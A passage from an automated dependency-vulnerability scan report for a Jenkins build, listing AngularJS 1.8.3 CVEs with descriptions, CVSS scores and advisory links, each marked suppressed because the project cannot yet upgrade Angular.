- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

[CVE-2024-8372](#) suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

#### Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*

- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*.\*

#### **CVE-2024-8373** suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/bGPQgMp/8da9ce87e99403ee13a295c305ebfa0b>
- info - <https://github.com/advisories/GHSA-mqm9-c95h-x2p6>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8373>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8373>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions up to (including) 1.8.3
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*.\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*.\*

#### **CVE-2025-2336** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/bNGYaXx/412a3a4218387479898912f60c269c6c>
- info - <https://github.com/advisories/GHSA-4p4w-6hg8-63wx>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-2336>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-2336>

Vulnerable Software & Versions (RETIREJS):

#### **CVE-2025-4690** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: medium

References:

- info - <https://codepen.io/herodevs/pen/RNNEPzP/751b91eab7730dff277523f3d50e4b77>
- info - <https://github.com/advisories/GHSA-hfff-63hg-f47j>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-4690>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-4690>

Vulnerable Software & Versions (RETIREJS):

**CVE-2025-0716** (RETIREJS) suppressed

Notes: We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://codepen.io/herodevs/pen/qEWQmpd/a86a0d29310e12c7a3756768e6c7b915>
- info - <https://github.com/advisories/GHSA-j58c-ww9w-pwp5>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2025-0716>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2025-0716>

Vulnerable Software & Versions (RETIREJS):

**End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021** (RETIREJS) suppressed

End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021

Notes: file name: remotegui.zip: angularjs.jar We can not yet update to newer Angular Version

Unscored:

- Severity: low

References:

- info - <https://docs.angularjs.org/misc/version-support-status>
- retid - 54

Vulnerable Software & Versions (RETIREJS):

## remotegui.zip: angular.jar

**Description:**

WebJar for angular

**License:**

MIT

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular.jar

**MD5:** f339a9a66a64c67eebb21ec3b251dfc6

**SHA1:** cff4aee339a9ca4ae2f095079930edeaad6a94ee

**SHA256:** a997eb40987ddb5d3bf64adf3d33afcff3ac2b1eb2e7255b5203a387f8097cd0

**Referenced In Project/Scope:** server

## Evidence



## Suppressed Identifiers

- None

## Suppressed Vulnerabilities



### CVE-2022-25844 (OSSINDEX) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

Sonatype's research suggests that this CVE's details differ from those defined at NVD. See <https://ossindex.sonatype.org/vulnerability/CVE-2022-25844> for details

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References:

- OSSINDEX - [\[CVE-2022-25844\] CWE-1333](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25844>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>
- OSSIndex - <https://www.tenable.com/cve/CVE-2022-25844>

Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars.npm:angular:1.8.3:\*:\*:\*:\*:\*

### CVE-2021-4231 (OSSINDEX) suppressed

A vulnerability was found in Angular up to 11.0.4/11.1.0-next.2. It has been classified as problematic. Affected is the handling of comments. The manipulation leads to cross site scripting. It is possible to launch the attack remotely but it might require an authentication first. Upgrading to version 11.0.5 and 11.1.0-next.3 is able to address this issue. The name of the patch is ba8da742e3b243e8f43d4c63aa842b44e14f2b09. It is recommended to upgrade the affected component.

Sonatype's research suggests that this CVE's details differ from those defined at NVD. See <https://ossindex.sonatype.org/vulnerability/CVE-2021-4231> for details

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.400000095367432)
- CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

References:

- OSSINDEX - [\[CVE-2021-4231\] CWE-79: Improper Neutralization of Input During Web Page Generation \('Cross-site Scripting'\)](#)

- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-4231>
- OSSIndex - <https://github.com/angular/angular/pull/40136>
- OSSIndex - <https://github.com/angular/angular/pull/40525>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars.npm:angular:1.8.3:\*.~\*~\*~\*~\*~\*~\*

**CVE-2023-26116** (OSSINDEX) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.300000190734863)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References:

- OSSINDEX - [\[CVE-2023-26116\] CWE-1333](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-26116>
- OSSIndex - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- OSSIndex - <https://stackblitz.com/edit/angularjs-vulnerability-angular-copy-redos?file=index.js>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars.npm:angular:1.8.3:\*.~\*~\*~\*~\*~\*~\*

**CVE-2023-26118** (OSSINDEX) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

Sonatype's research suggests that this CVE's details differ from those defined at NVD. See <https://ossindex.sonatype.org/vulnerability/CVE-2023-26118> for details

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.300000190734863)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References:

- OSSINDEX - [\[CVE-2023-26118\] CWE-1333](#)
- OSSIndex - <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-26118>
- OSSIndex - <https://github.com/advisories/GHSA-qwqh-hm9m-p5hr>
- OSSIndex - <https://stackblitz.com/edit/angularjs-vulnerability-inpur-url-validation-redos?file=index.js>
- OSSIndex - <https://www.sonatype.com/products/sonatype-guide/oss-index-users>

Vulnerable Software & Versions (OSSINDEX):

- cpe:2.3:a:org.webjars.npm:angular:1.8.3:\*.~\*~\*~\*~\*~\*~\*



## remotegui.zip: angular.jar: angular.js

**File Path:** /home/jenkins/workspace/reporting/Check-Product-Installer-for-Security-Problems/CRInstaller/server/build/tmp/dependencies/i-net Clear Reports/plugins/remotegui.zip/angular.jar/META-INF/resources/webjars/angular/1.8.3/angular.js

**MD5:** e09f650a016c24bc1b5a1edc93bfbade

**SHA1:** 0f1f7445b761b9bbd5385f9f0b316dbf1ca48696

**SHA256:** fdca889e76f55fdee7ab661920f37ce19233563bf7f4ac8120f8ebc2ac768768

**Referenced In Project/Scope:** server

### Evidence



### Suppressed Identifiers

- None

### Suppressed Vulnerabilities



#### [CVE-2022-25844](#) suppressed

The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER\_FORMATS.PATTERNS[1].posPre with a very high value.  
\*\*Note:\*\* 1) This package has been deprecated and is no longer maintained. 2) The vulnerable versions are 1.7.0 and higher.

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

CVSSv2:

- Base Score: MEDIUM (5.0)
- Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPWPSCSPMNODRDKK3/>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-m2h2-264f-f486>
- report@snky.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2WUSPYOTOMAZPDEFPWPSCSPMNODRDKK3/>

- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LNAKCNTVBIHWAUT3FKWV5N67PQXSZOO/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.7.0
- cpe:2.3:a:netapp:ontap\_select\_deploy\_administration\_utility:\*:\*:\*:\*:\*

**CVE-2024-21490** suppressed

This affects versions of the package angular from 1.3.0. A regular expression used to split the value of the ng-srcset directive is vulnerable to super-linear runtime due to backtracking. With large carefully-crafted input, this can result in catastrophic backtracking and cause a denial of service. **Note:** This package is EOL and will not receive any updates to address this issue. Users should migrate to `@angular/core` (<https://www.npmjs.com/package/@angular/core>).

CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- HIGH (7.5)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-4w4v-5hc9-xrr2>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-21490>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6241746>
- info - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6241747>
- info - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-6091113>
- info - <https://stackblitz.com/edit/angularjs-vulnerability-ng-srcset-redos>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angular.js:\*:\*:\*:\*:\* versions from (including) 1.3.0

**CVE-2022-25869** suppressed

All versions of the package angular; all versions of the package angularjs.core; all versions of the package angularjs are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of `<textarea>` elements.

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (6.1)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - [BROKEN\\_LINK](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-prc3-vjfx-vhm9>
- report@snyk.io - <https://neverendingsupport.github.io/angularjs-poc-cve-2022-25869>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJS-10771617>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-DOTNET-ANGULARJSORE-6084031>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-2949783>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-2949784>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2949782>
- report@snyk.io - <https://security.snyk.io/vuln/SNYK-JS-ANGULAR-2949781>

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\*

[CVE-2023-26116](#) suppressed

Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

#### CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

#### References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2vrf-hf26-jrp5>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

#### Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.2.21; versions up to (including) 1.8.3

[CVE-2023-26117](#) suppressed

Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the \$resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://github.com/advisories/GHSA-2qqx-w9hr-q5gx>
- report@snk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snk.io - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- report@snk.io - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.0.0; versions up to (including) 1.8.3

[CVE-2023-26118](#) suppressed

Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.

#### CWE-1333 Inefficient Regular Expression Complexity

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (5.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RC:R/MAV:A

References:

- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - [MAILING\\_LIST,THIRD\\_PARTY\\_ADVISORY](#)

- info - <https://github.com/advisories/GHSA-gwqh-hm9m-p5hr>
- report@snyk.io - <https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UDKFLKJ6VZKL52AFVW2OVZRMJWHMW55K/>
- report@snyk.io - [EXPLOIT](#)
- report@snyk.io - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- report@snyk.io - [MAILING\\_LIST\\_THIRD\\_PARTY\\_ADVISORY](#)

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.4.9; versions up to (including) 1.8.3

**CVE-2024-8372** suppressed

Improper sanitization of the value of the 'srcset' attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects AngularJS versions 1.3.0-rc.4 and greater.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status) .

CWE-1289 Improper Validation of Unsafe Equivalence in Input, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT\\_THIRD\\_PARTY\\_ADVISORY](#)
- af854a3a-2127-422b-91ae-364da2661108 - <https://lists.debian.org/debian-lts-announce/2025/07/msg00005.html>
- af854a3a-2127-422b-91ae-364da2661108 - [THIRD\\_PARTY\\_ADVISORY](#)
- info - <https://codepen.io/herodevs/full/xxoQRNL/0072e627abe03e9cda373bc75b4c1017>
- info - <https://github.com/advisories/GHSA-m9gf-397r-hwpg>
- info - <https://github.com/angular/angular.js>
- info - <https://nvd.nist.gov/vuln/detail/CVE-2024-8372>
- info - <https://www.herodevs.com/vulnerability-directory/cve-2024-8372>

Vulnerable Software & Versions (NVD):

- cpe:2.3:a:angularjs:angularjs:\*:\*:\*:\*:\* versions from (including) 1.3.1; versions up to (including) 1.8.3
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc4:\*:\*:\*:\*
- cpe:2.3:a:angularjs:angularjs:1.3.0:rc5:\*:\*:\*:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:linux:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:vsphere:\*
- cpe:2.3:a:netapp:active\_iq\_unified\_manager:-:\*:\*:\*:windows:\*

**CVE-2024-8373** suppressed

Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing [https://owasp.org/www-community/attacks/Content\\_Spoofing](https://owasp.org/www-community/attacks/Content_Spoofing) .

This issue affects all versions of AngularJS.

Note:

The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see [here https://docs.angularjs.org/misc/version-support-status](https://docs.angularjs.org/misc/version-support-status).

CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other

Notes: We can not yet update to newer Angular Version

CVSSv3:

- MEDIUM (4.3)
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R/MAV:A

References:

- 36c7be3b-2937-45df-85ea-ca7133ea542c - [EXPLOIT,THIRD\\_PARTY\\_ADVISORY](#)
